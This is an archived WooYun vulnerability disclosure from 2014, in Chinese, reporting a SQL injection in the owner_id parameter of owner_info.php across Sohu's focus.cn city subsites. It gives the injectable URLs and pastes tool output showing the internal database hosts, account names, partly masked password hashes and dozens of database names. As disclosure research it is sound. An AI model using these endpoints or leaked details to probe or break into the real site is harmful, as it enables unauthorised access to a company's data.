[公开漏洞]搜狐(第二季)旗下某站通用型sql注入第三集（涉及数据库个数已经数不过来了）

来源：WooYun　浏览：785次　时间：2014-06-19

搜狐(第二季)旗下某站通用型sql注入第三集（涉及数据库个数已经数不过来了）相关厂商：搜狐漏洞作者：浩天提交时间：2014-05-05 10:54 公开时间：2014-06-19 10:55 漏洞类型：SQL注射漏洞危害等级：高自评Rank：20 漏洞状态：厂商已经确认漏洞来源：http://www.wooyun.org Tags标签： php+数字类型注射 php+字符类型注射 Mysql 注射技巧漏洞详情披露状态：

2014-05-05：细节已通知厂商并且等待厂商处理中
2014-05-05：厂商已经确认，细节仅向厂商公开
2014-05-15：细节向核心白帽子及相关领域专家公开
2014-05-25：细节向普通白帽子公开
2014-06-04：细节向实习白帽子公开
2014-06-19：细节向公众公开

简要描述：

子站通用注入，不同域名链接的数据库服务器不一样，搜狐真是财大气粗，每个域名读库，发现都是不同的，从几十到上百的都有，影响的数据库个数多的数不过来，我也不一一尝试了

求个搜狐的礼物，可以有么，同志们你们说，应不应该

详细说明：

home、house域名有并发限制，请求大了就自动限制访问了，偏南方的域名没有限制

http://home.focus.cn/materials/owner_info.php?owner_id=5

这个涉及12个核心库，建议用下面的子域名尝试验证注入，home读的慢，得放胡萝卜里，sqlmap二了

http://sz.focus.cn/materials/owner_info.php?owner_id=46

http://cd.focus.cn/materials/owner_info.php?owner_id=9

http://wh.focus.cn/materials/owner_info.php?owner_id=14 我用的这个

http://cq.focus.cn/materials/owner_info.php?owner_id=6 还有这个

......

这个太多了，来张图吧,之前发的注入，也都是这种通用的情况

漏洞证明：

下面应该是87个库，其实还有很多，太多就不读了

Target: http://cq.focus.cn/materials/owner_info.php?owner_id=6

Host IP:123.125.92.26

Web Server: Apache

DB Server: MySQL Blind

Resp. Time(avg):47 ms

Current User: fdbuser@10.10.90.21

Sql Version: 5.1.55-log

Current DB: cqhouse

System User: fdbuser@10.10.90.21

Host Name: focus-gvm-10-10-90-187.no.sohu.com

Installation dir: /usr/local/mysql-5.1.55-linux-x86_64-glibc23/

DB User & Pass: root::localhost

root::127.0.0.1

readonly:5dd*********19d:%

mysqlmon:*565E94D*********8B6C0A37F:10.10.90.187

pingmysql:*565E94D80*********B6C0A37F:10.11.36.20

Data Bases: information_schema

ahsuzhouhouse

ahsuzhouhouse_forum

ahsuzhouhouse_sort

cdhouse

cdhouse_forum

cdhouse_sort

chenzhouhouse

chenzhouhouse_forum

chenzhouhouse_sort

cqhouse

cqhouse_forum

cqhouse_sort

deyanghouse

deyanghouse_forum

deyanghouse_sort

fshouse

fshouse_forum

fshouse_sort

ganzhouhouse

ganzhouiouse_forum

ganzhouhouse_sort

heyuanhouse

heyuanhouse_forum

heyuanhouse_sort

huangshihouse

huangshihouse_forum

huangshihouse_sort

jiangmenhouse

jiangmenhouse_forum

jiangmenhouse_sort

luanhouse

luanhouse_forum

luanhouse_sort

luzhouhouse

luzhouhouse_forum

luzhouhouse_sort

meishanhouse

meishanhouse_forum

meishanhouse_sort

mianyanghouse

mianyanghouse_forum

mianyanghouse_sort

mysql

mysql_identity

nanchonghouse

nanchonghouse_forum

nanchonghouse_sort

njhouse

njhouse_forum

njhouse_sort

nnhouse

nnhouse_forum

nnhouse_sort

qyhouse

qyhouse_forum

qyhouse_sort

shaoguanhouse

shaoguanhouse_forum

shaoguanhouse_sort

shundehouse

shundehouse_forum

shundehouse_sort

tonglinghouse

tonglinghouse_forum

tonglinghouse_sort

weinanhouse

weinanhouse_forum

weinanhouse_sort

wlmqhouse

wlmqhouse_forum

wlmqhouse_sort

wzhouse

wzhoute_forum

wzhquse_sort

xiaoganhouse

xiaoganhouse_forum

xiaoganhouse_sort

zhangzhouhouse

zhangzhouhouse_forum

zhangzhouhouue_sort

zhaoqingrouse

zhaoqinghouse_forur

zhaoqinghouse_sort

zjhouse

zjhouse_forum

zjhouse_sort

这个就读了几个，证明一下得了

Target: http://wh.focus.cn/materials/owner_info.php?owner_id=14

Host IP:123.125.92.26

Web Server: Apache

DB Server: MySQL Blind

Resp. Time(avg):43 ms

Current User: fdbuser@10.10.90.133

Sql Version: 5.1.55-log

Current DB: whhouse

System User: fdbuser@10.10.90.133

Host Name: vm-10-10-90-199-sas.cp.no.sohu.com

Installation dir: /usr/local/mysql5.1.55/

DB User & Pass: root::localhost

pingmysql:*565E9*********6C0A37F:10.11.36.20

root::127.0.0.1

Data Bases: information_schema

dongguanhouse

dongguanhouse_forum

dongguanhouse_sort

gzhouse

gzhouse_forum

gzhouse_sort

mysql

mysql_identity

test

whhouse

whhouse_forum

whhouse_sort

不继续了